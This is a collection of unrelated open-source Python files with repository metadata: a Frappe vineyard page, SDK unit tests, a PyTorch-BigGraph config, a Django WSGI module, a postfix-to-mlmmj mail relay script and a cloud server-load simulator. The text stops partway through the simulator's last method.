795ad5c281d91f2346ecbfec55695f576e490a77 | 1,725 | py | Python | frappe/www/vineyard_List8.py | process-success/frappeModifyed | 17031bdf5bb81d335d47aa3028a36be288bd9a1a | [
"MIT"
] | null | null | null | frappe/www/vineyard_List8.py | process-success/frappeModifyed | 17031bdf5bb81d335d47aa3028a36be288bd9a1a | [
"MIT"
] | null | null | null | frappe/www/vineyard_List8.py | process-success/frappeModifyed | 17031bdf5bb81d335d47aa3028a36be288bd9a1a | [
"MIT"
] | 1 | 2018-03-21T18:34:08.000Z | 2018-03-21T18:34:08.000Z | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import getdate, nowdate
no_cache = 1
no_sitemap = 1
ROWS_PER_PAGE = 2
def get_context(context):
	"""Build the website context for the vineyard list page.

	Rejects guests and website-only users, then loads all vineyards and all
	work orders for rendering.  NOTE(review): `frappe.errprint` calls look
	like leftover debug output — confirm before shipping.
	"""
	# Only desk (system) users may view this page.
	if (frappe.session.user == "Guest" or
		frappe.db.get_value("User", frappe.session.user, "user_type")=="Website User"):
		frappe.throw(_("You are not permitted to access this page."), frappe.PermissionError)
	vineyards = []
	joined = []
	for acc in frappe.db.sql("select * from `tabvineyards` where true", as_dict=1):
		vineyards.append(acc)
		frappe.errprint(acc)
	for acc in frappe.db.sql("select * from `tabWork Order` where true", as_dict=1):
		joined .append(acc)
		frappe.errprint(acc)
	#for acc in frappe.db.sql("select * from `tabCrv_attendance` at JOIN (`tabvineyards` v, `tabWork Order` wo) on at.vineyard=v.name AND at.work_order=wo.name", as_dict=1):
	# joined .append(acc)
	# frappe.errprint(acc)
	#for acc in frappe.db.sql("select wo.name, wo.subject, wo.project, wo.status, wo.priority, wo.exp_start_date, wo.expected_time, wo.task_weight, wo.exp_end_date, wo.progress, wo.description, wo.depends_on_tasks, wo.act_start_date, wo.actual_time, wo.act_end_date, wo.total_costing_amount, wo.total_expense_claim, wo.total_billing_amount, wo.review_date, wo.closing_date, wo.company, v.vineyard_name, v.address from `tabCrv_attendance` at JOIN (`tabvineyards` v, `tabWork Order` wo) on at.vineyard=v.name AND at.work_order=wo.name", as_dict=1):
	# joined .append(acc)
	# frappe.errprint(acc)
	# Keys are consumed by the page template; "pages" drives pagination size.
	return {
		"Svineyards" : vineyards,
		"Sjoined " : joined,
		"pages" : ROWS_PER_PAGE
	}
795ad5d4b27ec88fcab133fee96e864021f55ac1 | 192 | py | Python | nabu/processing/processors/__init__.py | rzcwade/nabu | 11238abd890b58a0f070c1886dc23b170b992b68 | [
"MIT"
] | 3 | 2019-02-15T03:28:42.000Z | 2019-06-29T14:39:58.000Z | nabu/processing/processors/__init__.py | rzcwade/nabu | 11238abd890b58a0f070c1886dc23b170b992b68 | [
"MIT"
] | null | null | null | nabu/processing/processors/__init__.py | rzcwade/nabu | 11238abd890b58a0f070c1886dc23b170b992b68 | [
"MIT"
] | 1 | 2019-04-19T06:58:47.000Z | 2019-04-19T06:58:47.000Z | '''@package processors
contains the data processors'''
from . import processor, processor_factory, audio_processor, text_processor,\
binary_processor, alignment_processor, textfile_processor
| 32 | 77 | 0.833333 |
795ad63b4c750ac7bb9bcd136f57a36aec51ad24 | 13,298 | py | Python | sdk/test/utils/config_api_helper/test_deliver.py | llnw/llnw-sdk-python | 0b3614e0e1f0b64c90d95ebd219646ea62d5efb4 | [
"Apache-2.0"
] | 5 | 2020-07-31T16:43:57.000Z | 2021-11-04T16:51:58.000Z | sdk/test/utils/config_api_helper/test_deliver.py | llnw/llnw-sdk-python | 0b3614e0e1f0b64c90d95ebd219646ea62d5efb4 | [
"Apache-2.0"
] | null | null | null | sdk/test/utils/config_api_helper/test_deliver.py | llnw/llnw-sdk-python | 0b3614e0e1f0b64c90d95ebd219646ea62d5efb4 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
from sdk.utils.config_api_helper.deilver import DeliverServiceInstanceObj, DeliverInstanceBaseException
shortname = "testname"
published_host = "www.example.com"
source_host = "www.example.origin.com"
published_protocol = "https"
source_protocol = "http"
profile_name = "Test_profile"
@pytest.fixture(scope="function")
def delivery_svc_instance():
"""Fixture for generating default DeliveryServiceInstance object"""
inst = DeliverServiceInstanceObj()
inst.generate_default(shortname, published_host, source_host,
profile_name, published_protocol, source_protocol)
return inst
@pytest.fixture(scope="function")
def add_protocol_set(delivery_svc_instance):
"""Fixture for adding protocolSet to DeliveryServiceInstance object"""
delivery_svc_instance.add_protocol_set()
@pytest.fixture(scope="function")
def add_option(delivery_svc_instance):
"""Fixture for adding option to DeliveryServiceInstance object"""
delivery_svc_instance.add_option("some_opt", option_parameters=["some_param"],
published_protocol=published_protocol, source_protocol=source_protocol)
def test_generate_default():
"""Test: Generate default Delivery Service Instance object
Steps:
1. Generate default DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is generated as expected
"""
expected = {"accounts": [{"shortname": shortname}],
"body": {"protocolSets": [{"options": [],
"publishedProtocol": published_protocol,
"sourceProtocol": source_protocol}],
"publishedHostname": published_host,
"publishedUrlPath": "",
"serviceKey": {"name": "delivery"},
"serviceProfileName": profile_name,
"sourceHostname": source_host,
"sourceUrlPath": ""}}
delivery_svc_inst = DeliverServiceInstanceObj()
delivery_svc_inst.generate_default(shortname, published_host, source_host,
profile_name, published_protocol, source_protocol)
assert expected == delivery_svc_inst
@pytest.mark.parametrize('pub,source', [(None, None), (published_protocol, source_protocol)])
def test_clear_protocol_set(delivery_svc_instance, pub, source):
"""Test: Clear protocolSets in Delivery Service Instance object
Steps:
1. Clear protocolSets in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.clear_protocol_set(published_protocol=pub, source_protocol=source)
assert not delivery_svc_instance["body"]["protocolSets"]
@pytest.mark.parametrize('pub,source', [(published_protocol, None), (None, source_protocol)])
def test_neg_clear_protocol_set(delivery_svc_instance, pub, source):
"""Test: Clear protocolSets with exception in Delivery Service Instance object
Steps:
1. Clear protocolSets, do not set either published or source protocol
2. Check raised exception
Result:
OK: exception is raised
"""
with pytest.raises(DeliverInstanceBaseException):
delivery_svc_instance.clear_protocol_set(published_protocol=pub, source_protocol=source)
def test_add_protocol_set(delivery_svc_instance):
"""Test: Add protocolSet to Delivery Service Instance object
Steps:
1. Add additional protocolSet to DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.add_protocol_set(published_protocol="http", source_protocol="http",
published_port=80, source_port=8080,
options=[{"name": "some_opt", "parameters": ["some_param"]}])
assert 2 == len(delivery_svc_instance["body"]["protocolSets"])
prot_set = {"publishedProtocol": "http",
"sourceProtocol": "http",
"publishedPort": 80,
"sourcePort": 8080,
"options": [{"name": "some_opt", "parameters": ["some_param"]}]}
assert prot_set == delivery_svc_instance["body"]["protocolSets"][1]
def test_add_more_protocol_set_than_allowed(delivery_svc_instance, add_protocol_set):
"""Test: Add more protocolSets than allowed to Delivery Service Instance object
Steps:
1. Add 2 additional protocolSets to DeliverySvcInstance object
2. Check that only 2 protocolSets are present in generated object
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.add_protocol_set(published_protocol="http", source_protocol="http",
published_port=80, source_port=8080,
options=[{"name": "some_opt", "parameters": ["some_param"]}])
assert 2 == len(delivery_svc_instance["body"]["protocolSets"])
def test_modify_protocol_set(delivery_svc_instance):
"""Test: Modify protocolSet in Delivery Service Instance object
Steps:
1. Modify protocolSet in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.modify_protocol_set(published_protocol=published_protocol, source_protocol=source_protocol,
options=[{"name": "some_opt", "parameters": ["some_param"]}])
assert 1 == len(delivery_svc_instance["body"]["protocolSets"])
prot_set = {"publishedProtocol": published_protocol,
"sourceProtocol": source_protocol,
"options": [{"name": "some_opt", "parameters": ["some_param"]}]}
assert prot_set == delivery_svc_instance["body"]["protocolSets"][0]
def test_add_option(delivery_svc_instance):
"""Test: Add option to protocolSet in Delivery Service Instance object
Steps:
1. Add option to protocolSet in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.add_option("some_opt", option_parameters=["some_param", 3],
published_protocol=published_protocol, source_protocol=source_protocol)
assert 1 == len(delivery_svc_instance["body"]["protocolSets"])
prot_set = {"publishedProtocol": published_protocol,
"sourceProtocol": source_protocol,
"options": [{"name": "some_opt", "parameters": ["some_param", 3]}]}
assert prot_set == delivery_svc_instance["body"]["protocolSets"][0]
def test_add_option_all_protocol_sets(delivery_svc_instance, add_protocol_set):
"""Test: Add option to all protocolSets in Delivery Service Instance object
Steps:
1. Add option to all protocolSets in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.add_option("some_opt", option_parameters=["some_param", 3])
assert 2 == len(delivery_svc_instance["body"]["protocolSets"])
option = [{"name": "some_opt", "parameters": ["some_param", 3]}]
for protocol_set in delivery_svc_instance["body"]["protocolSets"]:
assert option == protocol_set["options"]
def test_modify_options(delivery_svc_instance, add_option):
"""Test: Modify option in protocolSet in Delivery Service Instance object
Steps:
1. Modify option in protocolSet in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.modify_options("some_opt", ["upd_param"], published_protocol, source_protocol)
prot_set = {"publishedProtocol": published_protocol,
"sourceProtocol": source_protocol,
"options": [{"name": "some_opt", "parameters": ["upd_param"]}]}
assert prot_set == delivery_svc_instance["body"]["protocolSets"][0]
def test_modify_options_all_protocol_sets(delivery_svc_instance, add_protocol_set):
"""Test: Modify option in all protocolSets in Delivery Service Instance object
Steps:
1. Modify option in all protocolSets in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.add_option("some_opt", option_parameters=["some_param"])
delivery_svc_instance.modify_options("some_opt", ["upd_param"])
option = [{"name": "some_opt", "parameters": ["upd_param"]}]
for protocol_set in delivery_svc_instance["body"]["protocolSets"]:
assert option == protocol_set["options"]
def test_remove_option(delivery_svc_instance, add_option):
"""Test: Remove option from protocolSet in Delivery Service Instance object
Steps:
1. Remove option from protocolSet in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.remove_option("some_opt", published_protocol, source_protocol)
prot_set = {"publishedProtocol": published_protocol,
"sourceProtocol": source_protocol,
"options": []}
assert prot_set == delivery_svc_instance["body"]["protocolSets"][0]
def test_remove_options_all_protocol_sets(delivery_svc_instance, add_protocol_set):
"""Test: Remove option from all protocolSets in Delivery Service Instance object
Steps:
1. Remove option from all protocolSets in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
delivery_svc_instance.add_option("some_opt", option_parameters=["some_param"])
delivery_svc_instance.remove_option("some_opt")
for protocol_set in delivery_svc_instance["body"]["protocolSets"]:
assert [] == protocol_set["options"]
@pytest.mark.parametrize('field', ['revision', 'status', 'shortname'])
def test_process_response(delivery_svc_instance, field):
"""Test: Convert API response to Delivery Service Instance object
Steps:
1. Transform API response to DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is generated as expected
"""
api_response = {"uuid": "78df6c87-b19f-42cb-bee7-263ec58e3950",
"isLatest": True,
"isEnabled": True,
"revision": {"createdBy": "test_user",
"createdDate": 1530022531900,
"versionNumber": 3},
"meta": {"manifestVersion": "4",
"serviceIdentifier": "deliverysvcinst",
"serviceKey": "delivery"},
"status": {"state": "COMPLETED"},
"accounts": [{"shortname": shortname}],
"shortname": shortname,
"body": {"protocolSets": [{"publishedProtocol": published_protocol,
"sourceProtocol": source_protocol,
"options": [{"name": "req_send_header",
"parameters": ["X-CDN", "llnw"]}]}],
"serviceProfileName": profile_name,
"publishedHostname": published_host,
"sourceHostname": source_host,
"publishedUrlPath": "/",
"sourceUrlPath": "/",
"serviceKey": {"name": "delivery"}}}
delivery_svc_instance.process_response(api_response)
assert field not in delivery_svc_instance
def test_profile_name(delivery_svc_instance):
"""Test: Set Profile's name in Delivery Service Instance object
Steps:
1. Set profile's name in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
upd_profile_name = "Test_profile_upd"
delivery_svc_instance.profile_name = upd_profile_name
assert upd_profile_name == delivery_svc_instance["body"]["serviceProfileName"]
assert delivery_svc_instance.profile_name == delivery_svc_instance["body"]["serviceProfileName"]
def test_shortname(delivery_svc_instance):
"""Test: Set shortname in Delivery Service Instance object
Steps:
1. Set shortname in DeliverySvcInstance object
2. Compare expected result with actual
Result:
OK: deliverysvcinst object is updated as expected
"""
upd_shortname = "updshortname"
delivery_svc_instance.shortname = upd_shortname
assert upd_shortname == delivery_svc_instance["accounts"][0]["shortname"]
assert delivery_svc_instance.shortname == delivery_svc_instance["accounts"][0]["shortname"]
| 41.55625 | 117 | 0.670176 |
795ad68aea468bcc49e49e06ac3a560f3ffb6350 | 1,052 | py | Python | training/biggraph_config.py | d4l3k/ourgraph | 9a0f706babf3696a4747d5d4882575ecd9374a63 | [
"MIT"
] | 2 | 2019-09-07T03:41:58.000Z | 2019-10-08T06:04:24.000Z | training/biggraph_config.py | d4l3k/ourgraph | 9a0f706babf3696a4747d5d4882575ecd9374a63 | [
"MIT"
] | null | null | null | training/biggraph_config.py | d4l3k/ourgraph | 9a0f706babf3696a4747d5d4882575ecd9374a63 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE.txt file in the root directory of this source tree.
entity_base = "data/ourgraph"
def get_torchbiggraph_config():
    """Return the PyTorch-BigGraph configuration for training ourgraph embeddings."""
    # Graph structure: users link to documents via a single relation type.
    entity_types = {
        "user": {"num_partitions": 1},
        "doc": {"num_partitions": 1},
    }
    relation_types = [
        {
            "name": "l",
            "lhs": "user",
            "rhs": "doc",
            "operator": "complex_diagonal",
        },
    ]
    return dict(
        # I/O data
        entity_path=entity_base,
        edge_paths=[],
        checkpoint_path="model/ourgraph",
        entities=entity_types,
        relations=relation_types,
        dynamic_relations=False,
        # Scoring model
        dimension=100,
        global_emb=True,
        comparator="dot",
        # Training
        num_epochs=50,
        num_uniform_negs=1000,
        loss_fn="softmax",
        lr=0.001,
    )
| 21.916667 | 71 | 0.528517 |
795ad699fcea3df6d6adfa31e7e55b0c099d7149 | 394 | py | Python | heritago/heritago/wsgi.py | SWE574-Groupago/heritago | ec7d279df667a4f2c3560dfac4b5b17046163a95 | [
"MIT"
] | 6 | 2017-02-13T10:22:18.000Z | 2017-03-11T20:38:30.000Z | heritago/heritago/wsgi.py | SWE574-Groupago/heritago | ec7d279df667a4f2c3560dfac4b5b17046163a95 | [
"MIT"
] | 172 | 2017-02-12T21:07:27.000Z | 2017-06-08T10:46:58.000Z | heritago/heritago/wsgi.py | SWE574-RenameMe/heritago | ec7d279df667a4f2c3560dfac4b5b17046163a95 | [
"MIT"
] | 17 | 2017-02-13T08:29:37.000Z | 2017-06-29T14:43:53.000Z | """
WSGI config for heritago project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project's settings module unless the environment
# already configured one.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "heritago.settings")

# WSGI entry point consumed by application servers (gunicorn, mod_wsgi, ...).
application = get_wsgi_application()
| 23.176471 | 78 | 0.786802 |
795ad70fa8de3cf69e9b2d6b0cb6bd7614f5af02 | 4,560 | py | Python | postfix_incoming.py | FabianWe/mlmmj-docker | 08969e8b3fcf62777dbfe258edea5991844701ec | [
"MIT"
] | null | null | null | postfix_incoming.py | FabianWe/mlmmj-docker | 08969e8b3fcf62777dbfe258edea5991844701ec | [
"MIT"
] | null | null | null | postfix_incoming.py | FabianWe/mlmmj-docker | 08969e8b3fcf62777dbfe258edea5991844701ec | [
"MIT"
] | 1 | 2019-03-19T09:02:02.000Z | 2019-03-19T09:02:02.000Z | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Fabian Wenzelmann
# MIT License
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This script is used for accepting mails from postfix via a pipe transport.
# Usually in mlmmj you invoke /usr/bin/mlmmj-recieve. But the mlmmj is in
# another container. Therefore we invoke this file which sends the mail
# to the host running mlmmj (and so to mlmmj_listener.py).
import sys
import os
import requests
import json
import base64
import argparse
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Script called by postfix and sends mail to an mlmmj listener (mlmmj_listener.py).')
    parser.add_argument('nexthop', help='$nexthop from postfix')
    parser.add_argument('--mlmmj', type=str, required=False, help='Host of the mlmmj listener (ip or hostname). Default is to use the MLMMJ_HOST env variable (or "mlmmj" if not set)')
    parser.add_argument('--port', '-p', type=int, required=False, help='Port of the mlmmj listener. Default is to use the MLMMJ_PORT env variable (or 7777 if not set)')
    parser.add_argument('--spool', '-s', type=str, required=False, default='/var/spool/mlmmj', help='Path of the mlmmj directory (default is "/var/spool/mlmmj")')
    args = parser.parse_args()
    # Resolve the listener host: command-line flag wins, then MLMMJ_HOST env
    # variable, then the default "mlmmj".
    if args.mlmmj is None:
        mlmmj_host = os.environ.get('MLMMJ_HOST', 'mlmmj')
    else:
        mlmmj_host = args.mlmmj
    # Same precedence for the port (flag, then MLMMJ_PORT env, then 7777).
    if args.port is None:
        try:
            mlmmj_port = int(os.environ.get('MLMMJ_PORT', 7777))
        except ValueError as e:
            print('MLMMJ_PORT env variable must be an integer, errror:', e)
            sys.exit(1)
    else:
        mlmmj_port = args.port
    # After everything is ok we read the raw mail from stdin and base64-encode
    # it so it can travel inside a JSON payload.
    bytes_mail = sys.stdin.buffer.read()
    enc = base64.b64encode(bytes_mail).decode('utf-8')
    # Build the mlmmj-receive invocation. Use a dedicated name instead of
    # reusing (and clobbering) the argparse namespace 'args'.
    list_path = os.path.join(args.spool, args.nexthop)
    mlmmj_args = ['-F', '-L', list_path]
    data = {'mlmmj-command': 'mlmmj-receive', 'args': mlmmj_args, 'mail': enc}
    # We want some kind of timeout, so give the listener 10 minutes
    # (timeout=600 seconds) -- should be more than enough.
    try:
        response = requests.post('http://%s:%d' % (mlmmj_host, mlmmj_port),
                                 json=data, headers={'host': 'localhost.mlmmj'}, timeout=600)
    # Timeout is a subclass of RequestException, so it must be caught FIRST;
    # in the original order this branch was unreachable.
    except requests.exceptions.Timeout:
        print('receive post timed out, maybe a bug in the image?')
        sys.exit(1)
    except requests.exceptions.RequestException as e:
        print('Error while connecting to mlmmj listener:', e)
        sys.exit(1)
    # everything worked fine... get response
    if response.status_code != 200:
        print('Got weird return value, probably a bug? The listener should always return 200 status code')
    text = response.text
    # The listener answers with a JSON object: {'returncode': int, 'output': str}.
    try:
        json_data = json.loads(text)
    except ValueError as e:
        # Use the parsed nexthop here: sys.argv[1] may be an option flag, not the list name.
        print("Got a weird response, I don't know what happend to the mail, probably check /var/spool/mlmmj/%s/archive (can't parse json)" % args.nexthop)
        sys.exit(1)
    if 'returncode' not in json_data or 'output' not in json_data or not isinstance(json_data['returncode'], int):
        print("Got a weird response, I don't know what happend to the mail, probably check /var/spool/mlmmj/%s/archive (missing/wrong value in data)" % args.nexthop)
        sys.exit(1)
    if json_data['returncode'] != 0:
        print('mlmmj-receive returned with an error:', json_data['output'])
        sys.exit(json_data['returncode'])
    print(json_data['output'])
| 50.10989 | 183 | 0.700219 |
795ad74b4743fa9d1590539217b207e5671760f9 | 9,179 | py | Python | simulator/interfaceSimulator.py | shelpuk/AWS_simulator_for_reinforcement_learning | 7d43c22be8a89379b9f882f060502410f9bac9dc | [
"Unlicense",
"MIT"
] | 9 | 2018-06-11T08:07:45.000Z | 2021-03-08T20:10:58.000Z | simulator/interfaceSimulator.py | shelpuk/AWS_simulator_for_reinforcement_learning | 7d43c22be8a89379b9f882f060502410f9bac9dc | [
"Unlicense",
"MIT"
] | null | null | null | simulator/interfaceSimulator.py | shelpuk/AWS_simulator_for_reinforcement_learning | 7d43c22be8a89379b9f882f060502410f9bac9dc | [
"Unlicense",
"MIT"
] | 5 | 2018-07-07T09:18:06.000Z | 2021-06-23T17:46:00.000Z | import json
import csv
import random
import os
import re
import numpy as np
import gc
import copy
class server(object):
    """A simulated server instance (e.g. an on-demand or spot instance).

    A server starts in the 'starting' state, becomes 'operational' once
    ``setupTime`` minutes have elapsed since ``startTime``, and may become
    'crashed' at any minute according to ``failureProbability``.
    """

    # Minutes in a simulated day. The failure lookup table is indexed by
    # minute-of-day, so it should hold one draw per minute.
    MINUTES_PER_DAY = 1440

    def __init__(self,
                 startTime,
                 setupTime,
                 requestCanHandle = 50,
                 failureProbability = 0.,
                 type = 0):
        # NOTE: 'type' shadows the builtin, but it is part of the public
        # keyword interface (callers pass type=...) so it is kept.
        self.startTime = startTime
        self.setupTime = setupTime
        self.requestCanHandle = requestCanHandle
        self.status = 'starting'
        self.timeToOperational = setupTime
        self.failureProbability = failureProbability
        self.type = type
        # Was hard-coded to 1400 (a typo): every other consumer of this table
        # (updateStatus below and the daily regeneration in the simulator)
        # assumes a 1440-minute day.
        self.generateRandomSequence(sequenceSize=self.MINUTES_PER_DAY)

    def generateRandomSequence(self, sequenceSize):
        """(Re)draw the per-minute uniform [0, 1) failure lookup table."""
        self.randomSequence = np.random.uniform(0, 1, sequenceSize)

    def updateStatus(self, currentTime):
        """Advance the server's state to ``currentTime`` (in minutes)."""
        # Crash check: compare this minute-of-day's random draw against the
        # per-minute failure probability.
        minuteID = int(currentTime % self.MINUTES_PER_DAY)
        randomValue = self.randomSequence[minuteID % len(self.randomSequence)]
        if randomValue <= self.failureProbability:
            self.status = 'crashed'
        # While still starting, count down until setupTime has elapsed, then
        # flip to operational.
        if self.status == 'starting':
            if currentTime - self.startTime < self.setupTime:
                self.timeToOperational = self.setupTime - (currentTime - self.startTime)
            else:
                self.status = 'operational'
                self.timeToOperational = 0
class interfaceSimulator(object):
    """Simulator of a web service: stochastic request load plus a server fleet.

    Load patterns are read from CSV ``files`` (header row skipped); each data
    row is used as (id, mean, std) and per-minute request counts are drawn
    with ``random.gauss(mean, std)``.  Servers are ``server`` objects that
    start up, serve requests and may crash.
    """
    def __init__(self,
                 files,
                 timeframe = 10,
                 serverStartTime = 20,
                 initialServers=[4, 4],
                 startTimeShift = 0,
                 sequenceAutoUpdate = True,
                 serverTypes = 2,
                 failureProbabilities = [0., 0.005],
                 mode = 'M'):
        # NOTE(review): initialServers / failureProbabilities are mutable
        # default arguments -- safe only while never mutated in place.
        self.files = files
        self.timeframe = timeframe
        self.serverStartTime = serverStartTime
        self.initialServers = initialServers
        self.serverStartTime = serverStartTime  # NOTE(review): duplicate of the assignment above
        self.startTimeShift = startTimeShift
        self.sequenceAutoUpdate = sequenceAutoUpdate
        self.numPatterns = len(files)
        self.serverTypes = serverTypes
        self.failureProbabilities = failureProbabilities
        self.mode = mode
        self.iteration = 0
        self.emulationStartingTime = 0
        # Simulation clock in minutes, optionally shifted by whole hours.
        self.currentTime = self.emulationStartingTime + self.startTimeShift * 60
        self.__initializeData__(files)
        self.__initiateServers__(self.initialServers)
        self.__generateRandomSequence__()

    def __initializeData__(self, files):
        """Load every CSV file into self.fileData (one list of rows per file)."""
        self.fileData = []
        for file in files:
            self.fileData.append([])
            with open (file) as csvfile:
                reader = csv.reader(csvfile, delimiter=',')
                next(reader)  # skip the header row
                for row in reader:
                    self.fileData[-1].append(row)

    def __initiateServers__(self, number):
        """Create `number[type]` already-operational servers for each type."""
        output = []
        for type in range(len(number)):
            for s in [server(self.currentTime, 0, 0) for i in range(number[type])]:
                s.status = 'operational'
                s.type = type
                s.failureProbability = self.failureProbabilities[type]
                output.append(s)
        self.servers = output

    def __initiateSequences__(self):
        # NOTE(review): appears to be dead code -- __generateRandomSequence__
        # below does the same job and is what __init__ actually calls.
        self.sequence = []
        id = range(self.numPatterns)
        for i in id:
            sequenceInstance = [random.gauss(float(params[1]), float(params[2])) for params in self.fileData[i]]
            self.sequence.append(sequenceInstance)

    def __generateRandomServerSequence__(self, sequenceSize):
        """Redraw every server's per-minute failure lookup table."""
        for server in self.servers:
            server.generateRandomSequence(sequenceSize=sequenceSize)

    def __generateRandomSequence__(self, id=None):
        """Draw a fresh random request sequence for one pattern (or all of them)."""
        if id is not None and id >= self.numPatterns: raise Exception('Incorrect id: id of a sequence is higher than the number of sequences (files with data)')
        if id is None:
            self.sequence = []
            id = range(self.numPatterns)
            for i in id:
                sequenceInstance = [random.gauss(float(params[1]), float(params[2])) for params in self.fileData[i]]
                self.sequence.append(sequenceInstance)
        else:
            sequenceInstance = [random.gauss(float(params[1]), float(params[2])) for params in self.fileData[id]]
            self.sequence[id] = sequenceInstance
        # One failure draw per minute of a 1440-minute day.
        self.__generateRandomServerSequence__(sequenceSize=1440)

    def getSequenceId(self):
        # This is a stub allowing you to use several datasets (sequences, simulation modes).
        # For example, one mode could be for regular days and another - for black Friday sales spike.
        # For the purpose of this excersise we will use only ine simulation mode: regular days.
        return 0

    def setFailureProbability(self, failureProbabilities):
        """Update per-type failure probabilities and push them to live servers."""
        self.failureProbabilities = failureProbabilities
        for server in self.servers:
            server.failureProbability = failureProbabilities[server.type]

    def setLoad(self, load):
        # Mean request rate used in mode 'M'; must be called before
        # getNextState() when mode == 'M'.
        self.load = float(load)

    def getNextState(self):
        """Advance the simulation by `timeframe` minutes and return a summary dict."""
        seqNumRequests = []
        seqMeanCPU = []
        seqOperationaServers = []
        seqStartingServers = []
        for i in range(self.timeframe):
            seqID = int(self.getSequenceId())
            minuteID = int(self.currentTime % 1440)
            # NOTE(review): the modulo here uses len(self.fileData) (number of
            # FILES); indexing rows probably intends len(self.fileData[seqID])
            # (number of per-minute rows) -- confirm against the data files.
            params = self.fileData[seqID][minuteID % len(self.fileData)]
            if self.mode == 'M':
                # Mode 'M': gauss around the externally set load (see setLoad).
                seqNumRequests.append(random.gauss(float(self.load), float(params[2])))
            else:
                seqNumRequests.append(self.sequence[seqID][minuteID])
            seqOperationaServers.append(self.getNumOperationalServers())
            seqStartingServers.append(self.getNumStartingServers())
            prevOperationalServers = sum(seqOperationaServers[-1])
            # Avoid division by zero when no server is up (each server
            # handles 50 requests -- see server.requestCanHandle default).
            if prevOperationalServers < 1: prevOperationalServers = 0.1
            seqMeanCPU.append(seqNumRequests[-1] / (prevOperationalServers * 50.))
            self.currentTime += 1
            # Redraw the sequence at the start of every simulated day.
            if self.currentTime % 1440 == 0 and self.sequenceAutoUpdate:
                self.__generateRandomSequence__(seqID)
            self.updateServers()
        hour = np.floor((self.currentTime / 60) % 24)  # NOTE(review): computed but unused
        meanRequests = np.mean(seqNumRequests)
        maxCPULoad = np.mean(seqMeanCPU)
        numOperationalServers = np.mean(seqOperationaServers, axis=0)
        numStartingServers = np.mean(seqStartingServers, axis=0)
        return {'meanRequests':meanRequests,
                'numOperationalServers':numOperationalServers,
                'numStartingServers':numStartingServers,
                'failureProbabilities':self.failureProbabilities,
                'maxCPULoad':maxCPULoad,
                'servers':copy.deepcopy(self.servers),
                'currentTime':self.currentTime}

    def setState(self, state):
        """Restore clock and fleet from a dict produced by getNextState()."""
        self.currentTime = state['currentTime']
        self.servers = copy.deepcopy(state['servers'])

    def updateServers(self):
        """Tick every server and drop the ones that crashed this minute."""
        for s in self.servers:
            s.updateStatus(self.currentTime)
        self.servers = [server for server in self.servers if server.status != 'crashed']

    def getNumOperationalServers(self):
        # One count per server type.
        return [sum([1*(s.status == 'operational' and s.type == type) for s in self.servers]) for type in range(self.serverTypes)]

    def getNumStartingServers(self):
        # One count per server type.
        return [sum([1*(s.status == 'starting' and s.type == type) for s in self.servers]) for type in range(self.serverTypes)]

    def getStartingServers(self):
        return [i for i in self.servers if i.status == 'starting']

    def reset(self):
        """Rewind the clock and rebuild the initial fleet and sequences."""
        self.currentTime = self.emulationStartingTime  # NOTE(review): overwritten by the next line
        self.currentTime = self.emulationStartingTime + self.startTimeShift * 60
        self.__initiateServers__(self.initialServers)
        self.__generateRandomSequence__()

    def __startServer__(self, number, type, failureProbability):
        """Spawn `number` servers of `type`; they stay 'starting' for serverStartTime minutes."""
        for i in range(number):
            self.servers.append(server(self.currentTime, self.serverStartTime, failureProbability=failureProbability, type=type))

    def __stopServer__(self, number, type):
        """Retire `number` servers of `type`, oldest first; no-op (returns 0) when not enough are up."""
